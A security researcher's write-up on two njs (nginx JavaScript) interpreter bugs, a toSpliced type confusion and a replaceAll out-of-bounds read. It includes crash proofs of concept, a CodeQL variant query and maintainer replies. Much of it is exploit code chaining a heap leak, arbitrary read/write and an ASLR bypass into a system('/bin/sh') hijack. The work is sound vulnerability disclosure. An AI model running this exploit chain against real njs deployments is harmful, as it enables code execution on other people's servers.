I spent the last few weekends on a new target: njs, a JavaScript interpreter that is being used as part of the nginx webserver’s backend. Essentially, my goal is to find a way to break out of the interpreter’s sandbox without using require("child_process"); and friends.
After doing some fuzzing, I found two bugs. Then, used CodeQL to find more variants(!)
Note: The research was conducted on commit 74854b6edaa8a76fdc96395cdc7fbdfcd01425b6, which is the latest at the time of the research(May 2024).
Bug #1 - Type Confusion
The implementation of Array.prototype.toSpliced has a bug that allows you to get an array with un-initilized heap memory.
This could be leveraged to a type confusion primitive by:
Allocating Uint8Array buffer, the buffer wil contain bytes that form a njs_value_t object.
Free’ing it
Allocating an array using Array.prototype.toSpliced, the memory in this array will not be initilized because we trigger our bug. The address of this array will be the same address we free’d in step 2.
Profit, now we have an array with fake njs_value_t elements.
The PoC below triggers a segfault:
function trigger() { let buggy_arr = new Array(0x10); let retval; Object.defineProperty(buggy_arr, 0, { get: (s) => { throw new Error("brrrrr"); } }); try { retval = buggy_arr.toSpliced(0,0); } catch (e) { console.log(`error: ${e}`); } return retval;}let buggy = [];buggy = trigger();console.log('triggering bug');buggy.toString(); // segfault
In Array.prototype.toSpliced / njs_array_prototype_to_spliced, the code performs the following:
allocate an array
assign the ptr to retval by calling njs_set_array()
access the array members(which also trigger getter/setters) to populate the new array’s content
if something goes wrong, abort and return NJS_ERROR
array = njs_array_alloc(vm, 0, new_length, 0); // [1] if (njs_slow_path(array == NULL)) { return NJS_ERROR; } njs_set_array(retval, array); // [2] for (i = 0; i < start; i++) { ret = njs_value_property_i64(vm, this, i, &value); // [3] if (njs_slow_path(ret == NJS_ERROR)) { // [4] return NJS_ERROR; } ret = njs_value_create_data_prop_i64(vm, retval, i, &value, 0); if (njs_slow_path(ret != NJS_OK)) { return ret; } }
The problem is in step 2, we assign the new pointer to retval too early.
We assign to retval a heap chunk with un-initialized data, then, the throw new Error() exception(triggered by our getter) makes the function to bail out in the middle of the toSpliced operation, before the memory pointed by retval is fully initialized.
Visually, this is how retval variable is represented in memory:
As you can see, this is a JavaScript’s Array with elements, each element has a size of 16 bytes and represented with a njs_value_t struct.
Initial Exploit
So far, I came up with this, which is pretty similar to the initial PoC but with a few more strings and changes to the allocation sizes:
function trigger() { let buggy_arr = new Array(0x40); let retval; Object.defineProperty(buggy_arr, 0, { get: (s) => { throw new Error("brrrrr"); } }); try { retval = buggy_arr.toSpliced(0,0); } catch (e) { console.log(`error: ${e}`); } return retval;}// --- main ---let buggy = [];trigger();buggy = trigger();console.log('triggering bug');console.log(`length = ${buggy.length}`);// isNaN(buggy);console.log(buggy[2]);
I’m still working on figuring out how to shape the heap correctly, but so far I managed to create a scenario where buggy[0] lands on a glibc’s main_arena pointer.
It might be useful, but I’m not interested in this type of primitive. I’d like to make it re-usable(if that’s the term)/njs-oriented, like achieving a fake njs_value_t in order to build my way up to arbitrary r/w ➜ code exec.
If anyone wants to work on this together lmk :’)
UPDATE(31/May/2024): I brainstormed with @iamgweej about this bug and how it is possible to leverage it to RCE. The exploit is now ready! details are below
Full Exploit
I’ve been scratching my head for awhile on how to approach this bug, but then a friend(@iamgweej) came to the rescue. We worked on this together by peeking at the allocator’s logic. Eventually he found the way to achieve what I describe in Step 0 of the exploit-dev proccess. That one fxcking thing allowed us to continue and weaponize this bug to achieve stronger primitives and write our own exploits.
Below is a breakdown of my exp.js, how it works and the logic behind it.
Step 0 - Heap leak
To get a heap leak, we allocate a chunk with a size that is not njs_is_power_of_two(). This will “break alignment” of the chunk. As a result, the NJS engine will decide to round up the size and push a njs_mp_block_t struct in the remaining space(at the end of the chunk).
Create a Uint8Array buffer with a size that is not a power of two.
In the last 8 bytes of the byte array - craft a fake array element/njs_value_t and set its type to be an NJS_STRING with a size below 0xf to make it a ‘short string’(=Strings that are below 15 characters are embededd within the remaining space of njs_value_t.)
At this point we confused the contents of the free’d Uint8Array buffer with a JavaScript’s Array whose memory is not initialized(==still contains the contents of the Uint8Array).
Access the last element of the Array, it should be a short NJS_STRING containing the data of njs_mp_block_t(previously was part of the Uint8Array, accommodating its last 8 bytes).
Below is a PoC for the heap leak:
// globalsconst BUFSIZE = 0x410;let u8Arr = new Uint8Array(BUFSIZE+8);// helpersconst sus_func = (s) => { throw new Error("brrrrr"); }function trigger() { let retval; let buggy_arr = new Array(0x100); Object.defineProperty(buggy_arr, 0, { get: sus_func }); u8Arr.sort((x, y) => { return false; }); // free the uint8 buffer, this will be our forged arr try { retval = buggy_arr.toSpliced((BUFSIZE/0x10 + 1)); // trigger bug / alloc and bail-out } catch (e) { } return retval;}function ptr_u64(buff) { var int = buff[0]; for (var i = 1; i < buff.length; i++) { int += (buff[i] * Math.pow(2, 8 * i)); } return int;}function get_heapleak() { let fake_arr; // metadata u8Arr[0x10 * 0x41 + 0] = 5; // type: string u8Arr[0x10 * 0x41 + 1] = 0xfe; // short string u8Arr[0x10 * 0x41 + 2] = 0; u8Arr[0x10 * 0x41 + 3] = 0; u8Arr[0x10 * 0x41 + 4] = 0x42; u8Arr[0x10 * 0x41 + 5] = 0x42; u8Arr[0x10 * 0x41 + 6] = 0x42; u8Arr[0x10 * 0x41 + 7] = 0x42; fake_arr = trigger(); let leak = fake_arr[BUFSIZE/0x10]; let ptr_raw = Buffer.from(leak).slice(6); return ptr_raw;}// mainlet heap_ptr_raw, heap_ptr;heap_ptr_raw = get_heapleak();heap_ptr = ptr_u64(heap_ptr_raw);console.log(`[*] heap leak = 0x${heap_ptr.toString(16)}`)
[*] heap leak = 0x55851b7e3fb8
We leaked (njs_mp_block_t*)->node.left, nice :^)
Basically, we set the first 8 bytes of the njs_value_t with type-info of a string, and the allocator wrote the other half for us(which is the string’s content). Visually, this is how it looks like at runtime:
Step 1 - Getting an addrOf primitive
To figure out where we are on the heap, we can use the method from the previous step but with a small twist:
Now that we have a valid address in the VA space - we can forge another string, but with a greater length. We couldn’t do it previously because strings that have length above 15 requires a pointer to their contents. Now we have a valid pointer so we can leverage that to create even bigger OOB read primitive that will allow us to find the address of other objects on the heap.
To get an addrOf primitive, we:
Allocate a raw_buf = new Uint8Array(0x2000);, this buffer will be used in the next steps to forge more complex objects to achieve arbitrary r/w.
call oob_read() and provide the heap pointer we leaked from the previous step. This helper func will use the same technique from the previous step but with a string that has a type of ‘long string’, so we can dereference the pointer and get a large string(we confuse the elements of (njs_string_t*)->start with (njs_mp_block_t*)->node.right and (njs_string_t*)->length with (njs_mp_block_t*)->node.left).
oob_read() will return a string that points somewhere on the heap, with a very large size.
Then, we take the large string and search for the contents of raw_buf in it.
Once we find the offset of raw_buf within the large string, we can calculate the address of it by adding the offset to the pointer we leaked at step 0.
Now all we have to do is to manipulate the contents of raw_buf to change where fakeObj points to. This is done with the arb_read() and arb_write() helper functions @ exp.js#L141-L190
Step 3 - break ASLR
The allocator stores a function pointer to njs_mp_rbtree_compare() in its chunks’ metadata(njs_mp.c#L217).
To find the base address of the njs binary, we can use our arb_read() primitive to traverse through the allocator’s red-black tree until we find a pointer to njs_mp_rbtree_compare. This is implemented in exp.js#L229-L245 and from hereon - it shouldn’t be a problem to calculate any other address in the binary.
Step 4 - Get PC Control
At njs_process_script(), there’s a call to njs_console->engine->output():
static njs_int_t njs_process_script(njs_engine_t *engine, njs_console_t *console, njs_str_t *script){ njs_int_t ret; ret = engine->eval(engine, script); if (!console->suppress_stdout) { engine->output(engine, ret); }
The njs_engine_t::output struct member is a function pointer that we can overwrite in order to takeover the execution flow. We set this to system() as follows:
let njs_console = njs_base+0xc68c0;console.log(`[*] njs_console @ 0x${njs_console.toString(16)}`);let engine = ptr_u64(arb_read(njs_console));console.log(`[*] njs_console->engine @ 0x${engine.toString(16)}`);let fcn_ptr = engine+0x40; // engine->output() at offset 0x40console.log(`[*] njs_console->engine->output @ 0x${fcn_ptr.toString(16)}`);let libc_system = libc_base+0x50d70;arb_write(engine, [0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x73, 0x68, 0x0]); /* "/bin/sh\x00" */arb_write(fcn_ptr, ptr_p64(libc_system));console.log("[*] jumping to system(), go go go");
When the script will end, it will trigger a call to system() with a pointer to a njs_engine_t struct(we changed its first bytes to /bin/sh\x00 to pop a shell).
woop woop :^)
Note: Step 1 is still not 100% relaiable, i’m trying to look for ways to make it more stable. But overall, i’m very happy with the progress hehe
Spot more variants with CodeQL
I thought it could be useful to cook a CodeQL query that will detect if this pattern repeats itself in more places.
Essentially, the pattern is:
array = njs_array_alloc(vm, 0, length, 0); // allocating a new arraynjs_set_array(retval, array); // assigning the value of `retval` too early...ret = njs_value_property_i64(...); // trigger accessors(a thing that can cause exceptions and make the execution to bail out)
Query(sorry for poor syntax):
import cppimport semmle.code.cpp.dataflow.new.TaintTrackingimport semmle.code.cpp.dataflow.new.DataFlowimport semmle.code.cpp.controlflow.ControlFlowGraphfrom FunctionCall fc1, FunctionCall fc2, ExprStmt s, AssignExpr e, Expr source, Expr sink, Parameter retval, Function sus_func, Expr children, FunctionCall trigwhere // finding alloc & set_array fc1.getTarget().hasName("njs_array_alloc") and fc2.getTarget().hasName("njs_set_array") and s = fc1.getEnclosingStmt() and e = s.getExpr() and source = e.getAChild() and sink = fc2.getArgument(1) and sus_func = fc2.getEnclosingFunction() and retval = sus_func.getParameter(4) and DataFlow::localFlow(DataFlow::exprNode(source), DataFlow::exprNode(sink)) and DataFlow::localFlow(DataFlow::parameterNode(retval), DataFlow::exprNode(fc2.getArgument(0))) /* * We are supposed to use `ControlFlowGraph::successors_extended(src, dst)` * but it didn't work out ;_; so I'm using `getASuccessor*()` with a weird `exists()` filter */ and children = fc2.getASuccessor*() and trig.getTarget().getName().matches("%njs_value_property_i64%") and trig.getEnclosingFunction() = fc2.getEnclosingFunction() and exists( FunctionCall trig2 | (children = trig2 and trig=trig2))select source, sink ,trig as triggers, sus_func
This query yielded another two(!) vulnerable JS functions:
I was going to report about those too but then the project maintainer replied with this message to my initial report:
Thank you for the report and a good catch.
The root-cause here is in the step 2. We set a retval value too early. Unfortunately in NJS, the retval value will be visible outside the native JS function even if the exception was thrown.
I found similar places in
The moral of the story: ctrl+shift+f is faster than modeling a vulnerabillity with CodeQL.
It was a nice experience tho :^)
Bug #2 - OOB Read (could not exploit 😭)
It is possible to achieve OOB Read primitive/leak heap memory via String.prototype.replaceAll().
The way NJS stores UTF-8 Strings is by storing a string buffer followed by “map” of offsets.
The documentation for it can be found in njs_string.h#L45-L71.
A specially-crafted JS script can trigger an off-by-one bug in the function that resolves an offset inside a UTF-8 string, which then can be leveraged to achieve a bigger Out-of-Bound read(more than just one byte).
After playing around with the logic to figure out what causes the crash, I came up with this PoC:
console.log('str11', 'str22'); // this will put `0x5a5a5a5a` on the heap once `njs_parser` frees memory.// trigger buglet foo = String.fromCharCode(0x100).padStart(0x80);let bar = String.prototype.replaceAll.call(foo, '', 'w'); // segfault
In njs_string_prototype_replace(=String.prototype.replaceAll), during the last iteration of the do { ... } while (pos >= 0 ...); loop, the call to njs_string_utf8_offset() with a pos that points to the last byte of the string is triggering an unexpected behavior:
At first sight, I thought that the root cause of this is somewhere in njs_string_utf8_offset(), but after reporting to the maintainer he helped me to notice that this is actually in njs_string_index_of()!
Thank you for the report. I looked into the issue. The root cause is the fact that njs_string_index_of() which represent StringIndexOf() for zero-length search strings “finds” the search string even after the last character:
If searchValue is the empty String and fromIndex ≤ the length of string, this algorithm returns fromIndex. The empty String is effectively found at every position within a string, including after the last code unit.
NJS stores strings as UTF8 (not as UTF16 with always 2 bytes characters), to efficiently find a char byte offset by its index NJS stores a sparse offset map after a string body (if a string is UTF8 and its length is >= 32 character).
The sparse map is available only for indices [0, length - 1], so it is invalid to call njs_string_utf8_offset() with indices outside this range.
Because njs_string_index_of() returns valid pos after the last character njs_string_utf8_offset() is called with index equal to string.length.
It seems the bug is only visible when “this” string has >= 32 characters && s.length % 32 == 0.
Theoretical Exploit
Sadly, I could not exploit it due to those two lines at the end of the function:
Because we achieved Out-of-Bound, it means that the p_start will be bigger than string.start + string.size, this causes chain.error to become from 0 to 1.
As a result, the next line(which creates the final string/return value) will not generate the string since it checks whether chain.error is true or false.
Theoretically, if we could somehow manage to make chain.error stay 0, we’d be able to make the exploit work and leak heap data as follows: